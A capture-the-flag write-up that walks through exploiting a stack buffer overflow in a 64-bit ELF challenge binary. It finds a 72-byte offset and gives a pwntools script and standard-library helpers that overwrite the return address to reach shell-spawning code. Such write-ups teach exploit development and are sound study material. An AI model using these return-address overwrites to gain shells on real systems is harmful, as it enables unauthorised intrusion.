![3ba8fbe5e255c70c29fccc800a95390b.png](721577ea7fd748ceb708479a2b5b75d3.png)
Taking a look at the file, we see that it's **ELF 64-bit**:
```
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=ae6fb7020a27e2fdccdb6826a57ccc5bfc0d127a, not stripped
```
Loading it into **radare2** and listing the functions, we can see that there is a **win** function.
![1c47e6611914b5e056810c53bb25d00b.png](b534e32c13434280bb405f3d3b750fea.png)
Disassembling that function with `pdf @sym.main`
![e8c2e08aa304218deaf7b7e46cf86239.png](36066f0f53284759b863fd6842427d43.png)
There's a lot going on. It looks like when the function is called it checks for two arguments, `0xdeadbeef` and `0x1337c0de`, and then it gives us a shell. What if we skip the variable checks completely and jump straight to `0x004006cf`?
![cf83187a50f22756bcc76e1a9e827fdc.png](e4ba8524d894495ab9b700a5099033b0.png)
Loading the binary into **gdb** (with gef support), we can start poking at it and try to find the offset.
I was having issues with `pattern create/search`, so I did it the old-fashioned way: sending lots of 'A's and 'B's until something looked neat.
Using **gdb with gef** you can use `pi print('A'*100)` (`pi` evaluates Python inside gdb) to quickly toss a string of characters together.
After sending different lengths, I found that **72** was when we started seeing the 'B' characters leak in.
`pi print('A'*72 + 'B')`
![1d0c2ad3a03f013ae93ae75efe95b26e.png](4bb7af9cbe2c43938ab82bd141c02638.png)
Things we know:
1. The offset is **72**
2. The address we want to jump to is **0x004006cf**
3. It's an **ELF 64-bit** binary
That's enough to write a script using **Pwntools**. Here's mine:
```python
from pwn import *

# Challenge endpoint (host and port as given in the writeup)
p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io', 7480)

offset = b'A' * 72                       # padding up to the saved return address
print(p.recvuntil(b'joke\n'))            # bytes, not str: Python 3 pwntools expects bytes
p.sendline(offset + p64(0x004006cf))     # overwrite the return address with the shell-spawning code
p.interactive()                          # hand the resulting shell over to us
```
The `p64(0x004006cf)` call packs the address as an 8-byte **little-endian** value, which is the byte order an x86-64 return address must have on the stack, and `p.interactive()` hands the resulting shell over to us so we can send input.
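The offset-finding step that `pattern create/search` automates, and the little-endian packing that `p64()` does, written out with only the Python standard library. This is an added example, not the writeup's script or pwntools itself: `cyclic`/`cyclic_find` reproduce pwntools' defaults (lowercase alphabet, 4-byte windows), and the crash value used in the demo is constructed from the pattern rather than captured from the binary.

```python
import struct
from string import ascii_lowercase

ALPHABET = ascii_lowercase.encode()


def cyclic(length, alphabet=ALPHABET, n=4):
    """Prefix of a de Bruijn sequence (FKM algorithm): every n-byte window is
    unique, so the bytes found in the crashing register map back to exactly
    one position. Same defaults as pwntools' cyclic()."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:            # stop once enough bytes are produced
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def cyclic_find(leaked, alphabet=ALPHABET, n=4, max_len=4096):
    """Offset of the first n bytes of `leaked` (e.g. the value gef shows at
    $rsp when the overwritten return address is not canonical) in the pattern.
    Returns -1 if the bytes did not come from the pattern."""
    return cyclic(max_len, alphabet, n).find(leaked[:n])


def build_payload(offset, ret_addr):
    """'A' padding up to the saved return address, then the target address
    packed little-endian, exactly what p64() does in the pwntools script."""
    return b'A' * offset + struct.pack('<Q', ret_addr)


if __name__ == '__main__':
    pattern = cyclic(100)
    leaked = pattern[72:80]               # constructed: the 8 bytes that would land on the saved RIP
    off = cyclic_find(leaked)
    print('offset:', off)
    print('payload tail:', build_payload(off, 0x004006cf)[off:].hex())
```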
![09a1d31923b3c137fd108739b380d6c1.png](fdab4da1fdbc4d5db1aa5f916c4deecf.png)
---
Tags: #ctf #exploit_development #buffer_overflow